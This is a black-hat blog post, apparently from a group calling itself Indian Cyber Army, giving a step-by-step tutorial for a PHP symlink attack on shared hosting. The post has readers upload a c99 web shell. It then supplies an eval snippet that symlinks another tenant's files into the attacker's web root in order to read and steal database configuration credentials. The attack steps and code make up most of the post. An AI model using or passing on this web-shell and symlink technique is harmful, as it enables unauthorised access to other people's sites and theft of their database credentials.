shrimlinking ~ voice of Black Hat

++ ++
~*^...Symlink(PHP) Exploit Tutorial by Indian Cyber Army...^*~
++ ++

First of all we use Symlink function to make a shortcut for any file or folder we want

that's why this function will be very useful for us to read any folder or file we want(For More Info Use Google).

Here We are using the Shell Named "c99" to execute the small code of php(Eval Code) on the shared hosting server.

The Exploit is used to download the slave's database If and only if the slave is in a shared host

Download the below Shell & Follow the steps.

== ==
Get Any C99 Shell
== ==

/Step 1 $ Upload the php i.e Shell_ica.php

Shell on your root path. That is /home/hackerz/public_html .

/Step 2 $ Open the uploaded file . The path will look like

== ====
http://www.yoursitename.com/shell_ica.php
== ====

/Step 3 $ Next Step is read carefully the below php Eval Code . it's about 10 lines of php code.

!! !!!!!

$filepath='/home/xx/public_html/xx.xx';
$sitepath='/home/xx/public_html/';
$writeblefilepath='myfile.txt';$flib=$sitepath.$wr iteblefilepath;
@unlink($flib);
symlink($filepath, $flib);
echo readlink($flib) . "\n";
echo "".file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" . "tarea>"; @unlink($flib); !! !!!!!! /Step 4 $ You should replace (xx) in the code in the upper two lines. In the 1st xx in the line one, means the target username. In the 2nd xx.xx in the line one, means the target file full path in other word it's usually used to read database configuration files to to steel it's connection information. xx in the line two, means your username. "For Eg :- /home/Your_Ass/public_html/configuration.php" $writeblefilepath, to enter any writable path on your site & also it is used fo to do the link process, and write the output.For @unlink you can search for them on php.net . | | | | __- -- - -- - - -- - --- - -- - -- - -- - THE END..

Categories: shmrilinking

voice of Black Hat

shrimlinking

My Headlines

Categories

Popular Posts

Followers